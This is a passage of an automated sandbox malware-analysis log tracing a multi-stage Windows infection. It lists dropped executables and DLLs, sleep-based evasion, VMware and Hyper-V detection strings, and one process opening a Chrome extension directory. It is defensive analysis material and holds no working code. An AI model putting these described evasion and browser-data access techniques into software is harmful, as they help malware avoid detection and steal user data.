                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\mozglue[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\vcruntime140[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1014445001\182555961e.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\_hashlib.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1014443001\9774053d4c.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1014446001\799e7330b8.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9D01A5Jfed0VtJf6\Bunifu_UI_v1.5.3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3417.tmp.vvv.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\unicodedata.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\softokn3[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeAPI coverage: 3.1 %
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7916Thread sleep count: 327 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7916Thread sleep time: -654327s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7920Thread sleep count: 336 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7920Thread sleep time: -672336s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7864Thread sleep count: 313 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7864Thread sleep time: -9390000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7896Thread sleep count: 2724 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7896Thread sleep time: -5450724s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7912Thread sleep count: 339 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7912Thread sleep time: -678339s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7896Thread sleep count: 1390 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7896Thread sleep time: -2781390s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7892Thread sleep count: 533 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7892Thread sleep time: -1066533s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7892Thread sleep count: 1837 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7892Thread sleep time: -3675837s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7904Thread sleep count: 325 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7904Thread sleep time: -650325s >= -30000sJump to behavior
                      Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 2044Thread sleep count: 32 > 30
                      Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 2044Thread sleep time: -32000s >= -30000s
                      Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5080Thread sleep count: 52 > 30
                      Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5080Thread sleep time: -52000s >= -30000s
                      Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5080Thread sleep count: 59 > 30
                      Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5080Thread sleep time: -59000s >= -30000s
                      Source: C:\Windows\System32\audiodg.exe TID: 3528Thread sleep time: -50000s >= -30000s
                      Source: C:\Windows\System32\audiodg.exe TID: 3528Thread sleep count: 913 > 30
                      Source: C:\Windows\System32\audiodg.exe TID: 3528Thread sleep time: -45650000s >= -30000s
                      Source: C:\Windows\System32\audiodg.exe TID: 5912Thread sleep count: 108 > 30
                      Source: C:\Windows\System32\audiodg.exe TID: 5912Thread sleep time: -291600s >= -30000s
                      Source: C:\Windows\System32\audiodg.exe TID: 3528Thread sleep time: -50000s >= -30000s
                      Source: C:\Windows\System32\msiexec.exe TID: 4496Thread sleep time: -50000s >= -30000s
                      Source: C:\Windows\System32\msiexec.exe TID: 4496Thread sleep count: 967 > 30
                      Source: C:\Windows\System32\msiexec.exe TID: 4496Thread sleep time: -48350000s >= -30000s
                      Source: C:\Windows\System32\msiexec.exe TID: 6948Thread sleep count: 95 > 30
                      Source: C:\Windows\System32\msiexec.exe TID: 6948Thread sleep time: -256500s >= -30000s
                      Source: C:\Windows\System32\msiexec.exe TID: 4496Thread sleep time: -50000s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 1132Thread sleep time: -8805550s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 800Thread sleep time: -270000s >= -30000s
                      Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5784Thread sleep count: 46 > 30
                      Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5784Thread sleep time: -46000s >= -30000s
                      Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5784Thread sleep count: 68 > 30
                      Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5784Thread sleep time: -68000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 5836Thread sleep count: 1127 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 5836Thread sleep time: -2255127s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 4480Thread sleep count: 1065 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 4480Thread sleep time: -2131065s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 5576Thread sleep count: 142 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 5576Thread sleep count: 184 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 5576Thread sleep count: 125 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 6364Thread sleep time: -36000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 2352Thread sleep count: 1125 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 2352Thread sleep time: -2251125s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 3696Thread sleep count: 1116 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 3696Thread sleep time: -2233116s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 892Thread sleep count: 1124 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 892Thread sleep time: -2249124s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 2356Thread sleep count: 1139 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe TID: 2356Thread sleep time: -2279139s >= -30000s
                      Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 6832Thread sleep count: 72 > 30
                      Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 6832Thread sleep time: -72000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe TID: 6620Thread sleep time: -31359464925306218s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 2932Thread sleep count: 64 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 2932Thread sleep time: -128064s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 4028Thread sleep count: 50 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 4028Thread sleep time: -100050s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 6572Thread sleep count: 56 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 6572Thread sleep time: -112056s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 8072Thread sleep time: -52000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 2680Thread sleep count: 51 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 2680Thread sleep time: -102051s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 2084Thread sleep count: 58 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 2084Thread sleep time: -116058s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 5448Thread sleep count: 52 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 5448Thread sleep time: -104052s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 1356Thread sleep count: 46 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 1356Thread sleep time: -92046s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 6404Thread sleep count: 60 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe TID: 6404Thread sleep time: -120060s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeLast function: Thread delayed
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeLast function: Thread delayed
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeLast function: Thread delayed
                      Source: C:\Windows\System32\audiodg.exeLast function: Thread delayed
                      Source: C:\Windows\System32\audiodg.exeLast function: Thread delayed
                      Source: C:\Windows\System32\msiexec.exeLast function: Thread delayed
                      Source: C:\Windows\System32\msiexec.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F5E3CC FindClose,FindFirstFileExW,GetLastError,9_2_00007FF643F5E3CC
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F5E440 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,9_2_00007FF643F5E440
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F29B00 GetEnvironmentVariableW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,9_2_00007FF643F29B00
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F8070C FindFirstFileExW,9_2_00007FF643F8070C
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68459E3CC FindClose,FindFirstFileExW,GetLastError,11_2_00007FF68459E3CC
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68459E440 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,11_2_00007FF68459E440
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF684569B00 GetEnvironmentVariableW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,11_2_00007FF684569B00
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845C070C FindFirstFileExW,11_2_00007FF6845C070C
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D5FA54 FindFirstFileExW,12_2_00007FF711D5FA54
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D4CD08 FindClose,FindFirstFileExW,GetLastError,12_2_00007FF711D4CD08
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D4CD7C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,12_2_00007FF711D4CD7C
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD69B00 GetEnvironmentVariableW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,13_2_00007FF61DD69B00
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD9E440 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,13_2_00007FF61DD9E440
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD9E3CC FindClose,FindFirstFileExW,GetLastError,13_2_00007FF61DD9E3CC
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDC070C FindFirstFileExW,13_2_00007FF61DDC070C
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000
                      Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000
                      Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000
                      Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000
                      Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000
                      Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000
                      Source: C:\Windows\explorer.exeThread delayed: delay time: 90000
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                      Source: 602c785fe5.exe, 0000001B.00000003.2512849044.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, 602c785fe5.exe, 0000001B.00000003.2517175152.00000000011F2000.00000004.00000020.00020000.00000000.sdmp, 602c785fe5.exe, 0000001B.00000003.2512575874.00000000011EC000.00000004.00000020.00020000.00000000.sdmp, 602c785fe5.exe, 0000001B.00000003.2517529110.000000000121A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWrT?
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                      Source: explorer.exe, 00000014.00000003.3077307447.00000000096A3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000014.00000000.2216466843.00000000094DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                      Source: explorer.exe, 00000014.00000000.2217813962.00000000095E9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}?
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                      Source: dwVrTdy.exe, 00000009.00000003.2123332787.000001B9CE496000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE497000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2B70000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E2774AD000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E2773D6000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D64546000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2216466843.000000000952D000.00000004.00000001.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.2961780018.00000000055A1000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.2836146510.00000000055A1000.00000004.00000020.00020000.00000000.sdmp, 602c785fe5.exe, 0000001B.00000003.2512849044.00000000011F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
